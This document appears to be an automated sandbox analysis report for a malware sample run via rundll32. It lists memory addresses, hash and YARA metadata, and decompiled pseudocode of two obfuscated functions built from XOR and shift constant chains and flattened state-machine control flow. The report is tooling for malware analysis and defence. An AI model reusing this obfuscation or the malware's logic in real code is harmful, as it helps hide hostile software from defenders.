                                                                                                                      0x002b1f06
                                                                                                                      0x002b1de9
                                                                                                                      0x002b1de9
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7d
                                                                                                                      0x002b1d7f
                                                                                                                      0x00000000
                                                                                                                      0x002b1d7f
                                                                                                                      0x002b1e39
                                                                                                                      0x002b1e39
                                                                                                                      0x002b1e40
                                                                                                                      0x002b1e69
                                                                                                                      0x002b1e69
                                                                                                                      0x002b1e6d
                                                                                                                      0x002b1e6f
                                                                                                                      0x002b1e72
                                                                                                                      0x002b1e7e
                                                                                                                      0x002b1ead
                                                                                                                      0x002b1ec7
                                                                                                                      0x002b1ece
                                                                                                                      0x002b1ed3
                                                                                                                      0x002b1ee0
                                                                                                                      0x002b1ee9
                                                                                                                      0x002b1ee9
                                                                                                                      0x002b1e42
                                                                                                                      0x002b1e42
                                                                                                                      0x002b1e4a
                                                                                                                      0x002b1e4c
                                                                                                                      0x002b1e53
                                                                                                                      0x00000000
                                                                                                                      0x002b1e55
                                                                                                                      0x002b1e55
                                                                                                                      0x002b1e5d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b1e5d
                                                                                                                      0x002b1e53
                                                                                                                      0x002b1e4a
                                                                                                                      0x002b1e5f
                                                                                                                      0x00000000
                                                                                                                      0x002b1e5f
                                                                                                                      0x00000000
                                                                                                                      0x002b1e33
                                                                                                                      0x002b1daa
                                                                                                                      0x002b1db2
                                                                                                                      0x00000000
                                                                                                                      0x002b1f91
                                                                                                                      0x002b1dbe
                                                                                                                      0x002b1f70
                                                                                                                      0x002b1f70
                                                                                                                      0x002b1f76
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b1dc4
                                                                                                                      0x002b1dc4
                                                                                                                      0x002b1dd6
                                                                                                                      0x002b1de1
                                                                                                                      0x002b1de3
                                                                                                                      0x00000000
                                                                                                                      0x002b1de3
                                                                                                                      0x002b1dbe
                                                                                                                      0x002b1e0d
                                                                                                                      0x002b1e12
                                                                                                                      0x002b1e14
                                                                                                                      0x002b1e17
                                                                                                                      0x002b1e1a
                                                                                                                      0x002b1e20
                                                                                                                      0x00000000
                                                                                                                      0x002b1e20
                                                                                                                      0x002b1f9a
                                                                                                                      0x00000000
                                                                                                                      0x002b1f9a
                                                                                                                      0x002b1f21
                                                                                                                      0x002b1f24
                                                                                                                      0x002b1f2d
                                                                                                                      0x002b1f51
                                                                                                                      0x002b1f60
                                                                                                                      0x002b1f65
                                                                                                                      0x002b1f68
                                                                                                                      0x002b1f6f
                                                                                                                      0x00000000
                                                                                                                      0x002b1f6f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )|$.Wo$3`$^o$^o$_6$~X$~b
                                                                                                                      • API String ID: 0-3792513126
                                                                                                                      • Opcode ID: fb18f241cbdc7af115ddc97b7703403f4d60a40a44f56704d98bce7697ecc702
                                                                                                                      • Instruction ID: 46a29d4667d784e65c041a1004a89847434f1e0e847a1c87588fad6dcd02b0d8
                                                                                                                      • Opcode Fuzzy Hash: fb18f241cbdc7af115ddc97b7703403f4d60a40a44f56704d98bce7697ecc702
                                                                                                                      • Instruction Fuzzy Hash: FD024371C1031DDBCF28CFA1C98A9EEBBB1FB04354F208199E516BA264C7B44AA5CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C2753 Relevance: 10.2, Strings: 8, Instructions: 239COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002C2753(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				unsigned int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				void* _t233;
				void* _t246;
				intOrPtr _t251;
				intOrPtr* _t252;
				void* _t253;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				void* _t281;
				void* _t285;
				signed int* _t286;

				_t252 = __ecx;
				_t286 =  &_v232;
				_v172 = __ecx;
				_v136 = _v136 & 0x00000000;
				_v132 = _v132 & 0x00000000;
				_v140 = 0x217d3d;
				_v176 = 0xa426f0;
				_v176 = _v176 + 0xffffeb7e;
				_v176 = _v176 ^ 0xed8cc375;
				_v176 = _v176 ^ 0xed273dc0;
				_v220 = 0x3129fd;
				_v220 = _v220 + 0xffff6602;
				_v220 = _v220 + 0xfffff7e7;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000cbf49;
				_v212 = 0x151fab;
				_v212 = _v212 + 0x7196;
				_v212 = _v212 + 0xffffb9ae;
				_v212 = _v212 * 0x34;
				_t281 = 0x42637f8;
				_v212 = _v212 ^ 0x045541a5;
				_v148 = 0x54413c;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x0a8ad6a3;
				_v180 = 0x7a2f9c;
				_t276 = 0x52;
				_v180 = _v180 / _t276;
				_t277 = 0x3b;
				_v180 = _v180 * 0x43;
				_v180 = _v180 ^ 0x006060ee;
				_v144 = 0xa6782c;
				_v144 = _v144 + 0x5cb5;
				_v144 = _v144 ^ 0x00a488c7;
				_v228 = 0xec9e27;
				_v228 = _v228 >> 0x10;
				_v228 = _v228 * 0x57;
				_v228 = _v228 * 0x1a;
				_v228 = _v228 ^ 0x00091e6b;
				_v164 = 0xea1f52;
				_v164 = _v164 >> 6;
				_v164 = _v164 ^ 0x000e8f9b;
				_v168 = 0xaa796a;
				_v168 = _v168 << 9;
				_v168 = _v168 << 1;
				_v168 = _v168 ^ 0xa9e52790;
				_v232 = 0xe004fa;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x9f2834c7;
				_v232 = _v232 << 7;
				_v232 = _v232 ^ 0xac158818;
				_v152 = 0x480a21;
				_v152 = _v152 >> 0xa;
				_v152 = _v152 ^ 0x00051613;
				_v192 = 0xe4ba17;
				_v192 = _v192 << 0xc;
				_v192 = _v192 + 0xffffee51;
				_v192 = _v192 * 0x26;
				_v192 = _v192 ^ 0x39f6006f;
				_v184 = 0xc14080;
				_v184 = _v184 + 0xffffa387;
				_v184 = _v184 / _t277;
				_v184 = _v184 ^ 0x000e78de;
				_v224 = 0xaafc1b;
				_v224 = _v224 << 8;
				_v224 = _v224 | 0xe68448c7;
				_v224 = _v224 + 0xffffb5fa;
				_v224 = _v224 ^ 0xeef4be14;
				_v208 = 0x4cb450;
				_v208 = _v208 | 0x41a678b0;
				_v208 = _v208 << 3;
				_v208 = _v208 + 0xffff1daa;
				_v208 = _v208 ^ 0x0f7f4e1f;
				_v156 = 0xa14600;
				_v156 = _v156 | 0x4ac9cb75;
				_v156 = _v156 ^ 0x4ae3fffe;
				_v200 = 0x80f125;
				_v200 = _v200 >> 6;
				_v200 = _v200 + 0xa5;
				_v200 = _v200 + 0x7126;
				_v200 = _v200 ^ 0x0003bf81;
				_v216 = 0xe3f3ee;
				_v216 = _v216 ^ 0x7171deb4;
				_v216 = _v216 ^ 0xe1685078;
				_v216 = _v216 >> 0xf;
				_v216 = _v216 ^ 0x000d439d;
				_v188 = 0x120f5;
				_v188 = _v188 + 0x596b;
				_t152 =  &_v188; // 0x596b
				_t278 = 0x32;
				_v188 =  *_t152 * 0x15;
				_t251 = _v172;
				_v188 = _v188 / _t278;
				_v188 = _v188 ^ 0x0000a7a1;
				_v160 = 0xd711e5;
				_v160 = _v160 | 0x35682df8;
				_v160 = _v160 ^ 0x35f32f5b;
				_v196 = 0xd874e4;
				_t279 = 0x21;
				_t280 = _v172;
				_v196 = _v196 / _t279;
				_v196 = _v196 + 0xffffe729;
				_v196 = _v196 + 0xffff68b4;
				_v196 = _v196 ^ 0x0004b076;
				_v204 = 0xe57f56;
				_v204 = _v204 ^ 0xa54f8096;
				_v204 = _v204 + 0xc8c2;
				_v204 = _v204 + 0xffffef22;
				_v204 = _v204 ^ 0xa5a4489c;
				while(1) {
					L1:
					_t233 = 0xe70005f;
					do {
						while(_t281 != 0x42637f8) {
							if(_t281 == 0x44a4c11) {
								_t285 = E002BEF71(1, 0x10);
								_push(_t285);
								_push(_v148);
								_push( &_v128);
								_t253 = 0xb;
								E002B5A07(_t253, _v212);
								_t286 =  &(_t286[5]);
								_t281 = 0x5b07f93;
								goto L9;
							} else {
								if(_t281 == 0x5b07f93) {
									_t280 = E002CC9A9(_v144, _v228,  *_t252, _v164,  *((intOrPtr*)(_t252 + 4)));
									_t286 =  &(_t286[4]);
									__eflags = _t280;
									if(__eflags != 0) {
										_t281 = 0xc9ed25e;
										goto L9;
									}
								} else {
									if(_t281 == 0xc9ed25e) {
										_t285 = 0x4000;
										_push(_t252);
										_push(_t252);
										_t251 = E002C3512(0x4000);
										__eflags = _t251;
										_t233 = 0xe70005f;
										_t252 = _v172;
										_t281 =  !=  ? 0xe70005f : 0xdfcaecd;
										continue;
									} else {
										if(_t281 == 0xdfcaecd) {
											E002B68DE(_v188, _v160, _v196, _v204, _t280);
										} else {
											_t295 = _t281 - _t233;
											if(_t281 != _t233) {
												goto L15;
											} else {
												_push(_v208);
												_push(_v224);
												_push(0x2b136c);
												_t246 = E002BAB66(_v192, _v184, _t295);
												_push(_t280);
												_push( &_v128);
												_push(_t246);
												_push(_t285);
												_push(_t251);
												 *((intOrPtr*)(E002BC1DC(_v192, 0xbf7d08b0, 0xef)))();
												E002BAE03(_v156, _v200, _v216, _t246);
												_t286 =  &(_t286[0xa]);
												_t281 = 0xdfcaecd;
												L9:
												_t252 = _v172;
												goto L1;
											}
										}
									}
								}
							}
							L18:
							return _t251;
						}
						_t281 = 0x44a4c11;
						L15:
						__eflags = _t281 - 0xefc9c40;
					} while (__eflags != 0);
					goto L18;
				}
			}











































                                                                                                                      0x002c2753
                                                                                                                      0x002c2753
                                                                                                                      0x002c275d
                                                                                                                      0x002c2761
                                                                                                                      0x002c2768
                                                                                                                      0x002c276d
                                                                                                                      0x002c2775
                                                                                                                      0x002c277d
                                                                                                                      0x002c2785
                                                                                                                      0x002c278d
                                                                                                                      0x002c2795
                                                                                                                      0x002c279d
                                                                                                                      0x002c27a5
                                                                                                                      0x002c27ad
                                                                                                                      0x002c27b2
                                                                                                                      0x002c27ba
                                                                                                                      0x002c27c2
                                                                                                                      0x002c27ca
                                                                                                                      0x002c27d7
                                                                                                                      0x002c27db
                                                                                                                      0x002c27e0
                                                                                                                      0x002c27e8
                                                                                                                      0x002c27f0
                                                                                                                      0x002c27f5
                                                                                                                      0x002c27fd
                                                                                                                      0x002c280b
                                                                                                                      0x002c2810
                                                                                                                      0x002c281b
                                                                                                                      0x002c281c
                                                                                                                      0x002c2820
                                                                                                                      0x002c2828
                                                                                                                      0x002c2830
                                                                                                                      0x002c2838
                                                                                                                      0x002c2840
                                                                                                                      0x002c2848
                                                                                                                      0x002c2852
                                                                                                                      0x002c285b
                                                                                                                      0x002c285f
                                                                                                                      0x002c2867
                                                                                                                      0x002c286f
                                                                                                                      0x002c2874
                                                                                                                      0x002c287c
                                                                                                                      0x002c2884
                                                                                                                      0x002c2889
                                                                                                                      0x002c288d
                                                                                                                      0x002c2895
                                                                                                                      0x002c289d
                                                                                                                      0x002c28a1
                                                                                                                      0x002c28a9
                                                                                                                      0x002c28ae
                                                                                                                      0x002c28b6
                                                                                                                      0x002c28be
                                                                                                                      0x002c28c3
                                                                                                                      0x002c28cb
                                                                                                                      0x002c28d3
                                                                                                                      0x002c28d8
                                                                                                                      0x002c28e5
                                                                                                                      0x002c28e9
                                                                                                                      0x002c28f1
                                                                                                                      0x002c28f9
                                                                                                                      0x002c2907
                                                                                                                      0x002c290b
                                                                                                                      0x002c2913
                                                                                                                      0x002c291b
                                                                                                                      0x002c2920
                                                                                                                      0x002c2928
                                                                                                                      0x002c2930
                                                                                                                      0x002c293a
                                                                                                                      0x002c2942
                                                                                                                      0x002c294a
                                                                                                                      0x002c294f
                                                                                                                      0x002c2957
                                                                                                                      0x002c295f
                                                                                                                      0x002c2967
                                                                                                                      0x002c296f
                                                                                                                      0x002c2977
                                                                                                                      0x002c297f
                                                                                                                      0x002c2984
                                                                                                                      0x002c298c
                                                                                                                      0x002c2994
                                                                                                                      0x002c299c
                                                                                                                      0x002c29a4
                                                                                                                      0x002c29ac
                                                                                                                      0x002c29b4
                                                                                                                      0x002c29b9
                                                                                                                      0x002c29c1
                                                                                                                      0x002c29c9
                                                                                                                      0x002c29d1
                                                                                                                      0x002c29d8
                                                                                                                      0x002c29df
                                                                                                                      0x002c29eb
                                                                                                                      0x002c29ef
                                                                                                                      0x002c29f3
                                                                                                                      0x002c29fb
                                                                                                                      0x002c2a03
                                                                                                                      0x002c2a0b
                                                                                                                      0x002c2a13
                                                                                                                      0x002c2a1f
                                                                                                                      0x002c2a22
                                                                                                                      0x002c2a26
                                                                                                                      0x002c2a2a
                                                                                                                      0x002c2a32
                                                                                                                      0x002c2a3a
                                                                                                                      0x002c2a42
                                                                                                                      0x002c2a4a
                                                                                                                      0x002c2a52
                                                                                                                      0x002c2a5a
                                                                                                                      0x002c2a62
                                                                                                                      0x002c2a6a
                                                                                                                      0x002c2a6a
                                                                                                                      0x002c2a6a
                                                                                                                      0x002c2a6f
                                                                                                                      0x002c2a6f
                                                                                                                      0x002c2a81
                                                                                                                      0x002c2b7d
                                                                                                                      0x002c2b86
                                                                                                                      0x002c2b87
                                                                                                                      0x002c2b8f
                                                                                                                      0x002c2b92
                                                                                                                      0x002c2b93
                                                                                                                      0x002c2b98
                                                                                                                      0x002c2b9b
                                                                                                                      0x00000000
                                                                                                                      0x002c2a87
                                                                                                                      0x002c2a8d
                                                                                                                      0x002c2b5c
                                                                                                                      0x002c2b5e
                                                                                                                      0x002c2b61
                                                                                                                      0x002c2b63
                                                                                                                      0x002c2b65
                                                                                                                      0x00000000
                                                                                                                      0x002c2b65
                                                                                                                      0x002c2a93
                                                                                                                      0x002c2a99
                                                                                                                      0x002c2b10
                                                                                                                      0x002c2b1d
                                                                                                                      0x002c2b1e
                                                                                                                      0x002c2b26
                                                                                                                      0x002c2b2e
                                                                                                                      0x002c2b30
                                                                                                                      0x002c2b36
                                                                                                                      0x002c2b3a
                                                                                                                      0x00000000
                                                                                                                      0x002c2a9b
                                                                                                                      0x002c2aa1
                                                                                                                      0x002c2bc9
                                                                                                                      0x002c2aa7
                                                                                                                      0x002c2aa7
                                                                                                                      0x002c2aa9
                                                                                                                      0x00000000
                                                                                                                      0x002c2aaf
                                                                                                                      0x002c2aaf
                                                                                                                      0x002c2ab3
                                                                                                                      0x002c2abf
                                                                                                                      0x002c2ac4
                                                                                                                      0x002c2ad7
                                                                                                                      0x002c2ad8
                                                                                                                      0x002c2ad9
                                                                                                                      0x002c2ada
                                                                                                                      0x002c2adb
                                                                                                                      0x002c2ae7
                                                                                                                      0x002c2af6
                                                                                                                      0x002c2afb
                                                                                                                      0x002c2afe
                                                                                                                      0x002c2b03
                                                                                                                      0x002c2b03
                                                                                                                      0x00000000
                                                                                                                      0x002c2b03
                                                                                                                      0x002c2aa9
                                                                                                                      0x002c2aa1
                                                                                                                      0x002c2a99
                                                                                                                      0x002c2a8d
                                                                                                                      0x002c2bd4
                                                                                                                      0x002c2bdd
                                                                                                                      0x002c2bdd
                                                                                                                      0x002c2ba5
                                                                                                                      0x002c2baa
                                                                                                                      0x002c2baa
                                                                                                                      0x002c2baa
                                                                                                                      0x00000000
                                                                                                                      0x002c2bb6

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !H$&q$<AT$=}!$kYo$o$xPh$``
                                                                                                                      • API String ID: 0-1374268856
                                                                                                                      • Opcode ID: fda34d55eadfb4ee5d40964cd032e3d970c2dc1411e8d8896079fb0560461940
                                                                                                                      • Instruction ID: 3dbed4beb3c364003d9113209a02bd915339863cc6a4e09ec7800d7a36c2229a
                                                                                                                      • Opcode Fuzzy Hash: fda34d55eadfb4ee5d40964cd032e3d970c2dc1411e8d8896079fb0560461940
                                                                                                                      • Instruction Fuzzy Hash: 09B140B24183819FD354CF29C48AA0BFBF0BBD4758F104A2DF5A696260D7B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CA429 Relevance: 9.1, Strings: 7, Instructions: 389COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002CA429(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				intOrPtr _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t471;
				signed int _t488;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t496;
				signed int _t497;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t503;
				void* _t552;
				void* _t553;
				signed int _t556;
				signed int* _t558;

				_t558 =  &_v2792;
				_v2604 = _v2604 & 0x00000000;
				_v2616 = 0xa4b63e;
				_v2612 = 0x1047f0;
				_v2608 = 0x380de4;
				_v2640 = 0x3665dd;
				_v2640 = _v2640 >> 1;
				_v2640 = _v2640 ^ 0x001b32c7;
				_v2748 = 0xd91e11;
				_v2748 = _v2748 + 0xffffc541;
				_v2748 = _v2748 ^ 0x51c605c4;
				_v2748 = _v2748 ^ 0x6a8dd901;
				_v2748 = _v2748 ^ 0x3b9e7a9b;
				_v2788 = 0x157b94;
				_v2788 = _v2788 + 0xffffeadc;
				_v2788 = _v2788 >> 0x10;
				_v2788 = _v2788 + 0xffff73d6;
				_v2788 = _v2788 ^ 0xffff2eba;
				_v2716 = 0x64154b;
				_v2716 = _v2716 * 0x75;
				_t552 = __ecx;
				_v2716 = _v2716 << 3;
				_t553 = 0x422d362;
				_v2716 = _v2716 ^ 0x6de46b99;
				_v2720 = 0x9c58cd;
				_v2720 = _v2720 + 0xffff09d2;
				_v2720 = _v2720 + 0x2545;
				_v2720 = _v2720 ^ 0x00913431;
				_v2688 = 0xaeb597;
				_v2688 = _v2688 ^ 0x90c85188;
				_t556 = 0x69;
				_v2688 = _v2688 / _t556;
				_v2688 = _v2688 ^ 0x016f083f;
				_v2624 = 0xf336a7;
				_v2624 = _v2624 ^ 0x0756d720;
				_v2624 = _v2624 ^ 0x07af532c;
				_v2780 = 0x2eb910;
				_v2780 = _v2780 + 0xffff6a34;
				_v2780 = _v2780 + 0x3a3b;
				_v2780 = _v2780 >> 0xc;
				_v2780 = _v2780 ^ 0x00093eda;
				_v2696 = 0x95c01d;
				_v2696 = _v2696 ^ 0xd4af9b47;
				_t488 = 0x43;
				_v2696 = _v2696 * 0x38;
				_v2696 = _v2696 ^ 0x6cc3512a;
				_v2756 = 0x7bda8f;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 + 0xffff790e;
				_v2756 = _v2756 << 1;
				_v2756 = _v2756 ^ 0x00077f92;
				_v2672 = 0xbe500a;
				_v2672 = _v2672 * 0x69;
				_v2672 = _v2672 ^ 0x4e081773;
				_v2664 = 0xf21545;
				_v2664 = _v2664 << 1;
				_v2664 = _v2664 ^ 0x01e0a5ee;
				_v2712 = 0x4aa3d0;
				_v2712 = _v2712 / _t488;
				_v2712 = _v2712 + 0xffffba00;
				_v2712 = _v2712 ^ 0x00096837;
				_v2704 = 0x6e8851;
				_v2704 = _v2704 * 0x4c;
				_v2704 = _v2704 ^ 0x74892048;
				_v2704 = _v2704 ^ 0x54501412;
				_v2740 = 0x9704ff;
				_t491 = 0x4c;
				_v2740 = _v2740 / _t491;
				_v2740 = _v2740 + 0xffff50cb;
				_v2740 = _v2740 / _t556;
				_v2740 = _v2740 ^ 0x0004486b;
				_v2772 = 0xa165e2;
				_t492 = 0x36;
				_v2772 = _v2772 / _t492;
				_v2772 = _v2772 ^ 0x6089554b;
				_t493 = 0x29;
				_v2772 = _v2772 * 0x30;
				_v2772 = _v2772 ^ 0x1a2b5067;
				_v2680 = 0xe9519d;
				_v2680 = _v2680 / _t493;
				_v2680 = _v2680 | 0xd8f73a5a;
				_v2680 = _v2680 ^ 0xd8f0b3ca;
				_v2656 = 0x3fe983;
				_t494 = 0x30;
				_v2656 = _v2656 / _t494;
				_v2656 = _v2656 ^ 0x00046ac2;
				_v2628 = 0x33b4cd;
				_t495 = 0x11;
				_v2628 = _v2628 / _t495;
				_v2628 = _v2628 ^ 0x00043067;
				_v2648 = 0x47920b;
				_t496 = 0x1a;
				_v2648 = _v2648 * 7;
				_v2648 = _v2648 ^ 0x01f55662;
				_v2636 = 0xc27dad;
				_v2636 = _v2636 | 0xeea2905e;
				_v2636 = _v2636 ^ 0xeee70f52;
				_v2792 = 0xce83a7;
				_v2792 = _v2792 | 0x91097b86;
				_v2792 = _v2792 >> 0x10;
				_v2792 = _v2792 + 0xfffff873;
				_v2792 = _v2792 ^ 0x000d88b9;
				_v2764 = 0x687458;
				_v2764 = _v2764 + 0xffff3130;
				_v2764 = _v2764 / _t488;
				_v2764 = _v2764 | 0xf90624cd;
				_v2764 = _v2764 ^ 0xf90653f7;
				_v2784 = 0xf92951;
				_v2784 = _v2784 + 0xffff51be;
				_v2784 = _v2784 ^ 0x8ae9764d;
				_v2784 = _v2784 + 0x99a0;
				_v2784 = _v2784 ^ 0x8a16d001;
				_v2732 = 0xd5993f;
				_v2732 = _v2732 / _t496;
				_v2732 = _v2732 + 0xffff4990;
				_v2732 = _v2732 ^ 0x000978e2;
				_v2724 = 0xcf1521;
				_v2724 = _v2724 >> 2;
				_v2724 = _v2724 << 0xa;
				_v2724 = _v2724 ^ 0xcf1adb57;
				_v2728 = 0xc9d07f;
				_v2728 = _v2728 + 0xffff241f;
				_v2728 = _v2728 + 0xffff5e1a;
				_v2728 = _v2728 ^ 0x00c03f16;
				_v2632 = 0x51b7a0;
				_t497 = 0xd;
				_v2632 = _v2632 / _t497;
				_v2632 = _v2632 ^ 0x0003c006;
				_v2768 = 0xdee1c4;
				_t498 = 0x72;
				_v2768 = _v2768 * 0x4b;
				_v2768 = _v2768 ^ 0x45bd8e4b;
				_v2768 = _v2768 + 0x810;
				_v2768 = _v2768 ^ 0x04f5c4f4;
				_v2620 = 0x673f5;
				_v2620 = _v2620 / _t498;
				_v2620 = _v2620 ^ 0x0006a8dc;
				_v2776 = 0xc1ae10;
				_t499 = 0x5a;
				_v2776 = _v2776 * 0x5d;
				_v2776 = _v2776 / _t499;
				_t500 = 0x7a;
				_v2776 = _v2776 / _t500;
				_v2776 = _v2776 ^ 0x0000f358;
				_v2668 = 0x9bfbd0;
				_v2668 = _v2668 * 0x2e;
				_v2668 = _v2668 ^ 0x1c042184;
				_v2700 = 0xcd0c2b;
				_v2700 = _v2700 >> 8;
				_v2700 = _v2700 + 0xfffff064;
				_v2700 = _v2700 ^ 0x0007642a;
				_v2708 = 0x1a6cb4;
				_v2708 = _v2708 ^ 0x57f593cf;
				_v2708 = _v2708 | 0x44881231;
				_v2708 = _v2708 ^ 0x57eba098;
				_v2752 = 0xd7110a;
				_v2752 = _v2752 / _t556;
				_v2752 = _v2752 << 0xe;
				_v2752 = _v2752 + 0xffff1365;
				_v2752 = _v2752 ^ 0x83185000;
				_v2760 = 0xc45920;
				_v2760 = _v2760 + 0xffffdf34;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xfa48;
				_v2760 = _v2760 ^ 0x00031526;
				_v2652 = 0x3af3c9;
				_v2652 = _v2652 << 0xf;
				_v2652 = _v2652 ^ 0x79efd05d;
				_v2660 = 0x38b4f1;
				_v2660 = _v2660 ^ 0x7076ccd1;
				_v2660 = _v2660 ^ 0x704b934c;
				_v2744 = 0x6269bc;
				_v2744 = _v2744 | 0xfa5eccfb;
				_v2744 = _v2744 * 0x5f;
				_v2744 = _v2744 << 0xe;
				_v2744 = _v2744 ^ 0x9469f4ee;
				_v2676 = 0x941055;
				_v2676 = _v2676 | 0xfd7f72ef;
				_v2676 = _v2676 ^ 0xfdfef17e;
				_v2684 = 0x7199f;
				_v2684 = _v2684 + 0x9aa9;
				_v2684 = _v2684 << 0xe;
				_v2684 = _v2684 ^ 0xed16f6de;
				_v2644 = 0xf4560;
				_v2644 = _v2644 * 0x1c;
				_v2644 = _v2644 ^ 0x01a06f93;
				_v2692 = 0x891e84;
				_v2692 = _v2692 ^ 0x46454346;
				_v2692 = _v2692 | 0x068a2534;
				_v2692 = _v2692 ^ 0x46ca9877;
				_v2736 = 0x29dfc8;
				_t471 = _v2736 * 0x19;
				_v2736 = _t471;
				_v2736 = _v2736 | 0x3d4578d3;
				_v2736 = _v2736 >> 4;
				_v2736 = _v2736 ^ 0x03d45238;
				while(_t553 != 0x2953b22) {
					if(_t553 == 0x422d362) {
						_t553 = 0xe704baa;
						continue;
					} else {
						_t565 = _t553 - 0xe704baa;
						if(_t553 != 0xe704baa) {
							L8:
							__eflags = _t553 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002D12A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
							 *((short*)(E002C4FA8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
							E002B8650(_v2780,  &_v1560, _t565, _v2696);
							_push(_v2712);
							_push(_v2664);
							_push(0x2b181c);
							E002BE7CE(E002BAB66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
							E002BAE03(_v2628, _v2648, _v2636, _t483);
							_t500 = _v2792;
							_t471 = E002CC38F(_t500,  &_v2080, _t552, _v2764);
							_t558 =  &(_t558[0x15]);
							if(_t471 != 0) {
								_t553 = 0x2953b22;
								continue;
							}
						}
					}
					return _t471;
				}
				_push(_t500);
				E002BEA7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
				_push(_v2776);
				_push(_v2620);
				_push(0x2b185c);
				E002BE7CE(E002BAB66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
				_t503 = _v2652;
				E002BAE03(_t503, _v2660, _v2744, _t473);
				__eflags = 0;
				_push(_v2736);
				_push(_v2692);
				_push(_v2644);
				_push(0);
				_push(0);
				_push(_v2684);
				_push(_t503);
				_push(0);
				_t500 =  &_v520;
				_t471 = E002B9700(_t500, _v2676, 0);
				_t558 =  &(_t558[0x1c]);
				_t553 = 0x740d40c;
				goto L8;
			}









































































                                                                                                                      0x002ca429
                                                                                                                      0x002ca42f
                                                                                                                      0x002ca439
                                                                                                                      0x002ca444
                                                                                                                      0x002ca44f
                                                                                                                      0x002ca45a
                                                                                                                      0x002ca465
                                                                                                                      0x002ca46c
                                                                                                                      0x002ca477
                                                                                                                      0x002ca47f
                                                                                                                      0x002ca487
                                                                                                                      0x002ca48f
                                                                                                                      0x002ca497
                                                                                                                      0x002ca49f
                                                                                                                      0x002ca4a7
                                                                                                                      0x002ca4af
                                                                                                                      0x002ca4b4
                                                                                                                      0x002ca4bc
                                                                                                                      0x002ca4c4
                                                                                                                      0x002ca4d5
                                                                                                                      0x002ca4d9
                                                                                                                      0x002ca4db
                                                                                                                      0x002ca4e0
                                                                                                                      0x002ca4e5
                                                                                                                      0x002ca4ed
                                                                                                                      0x002ca4f5
                                                                                                                      0x002ca4fd
                                                                                                                      0x002ca505
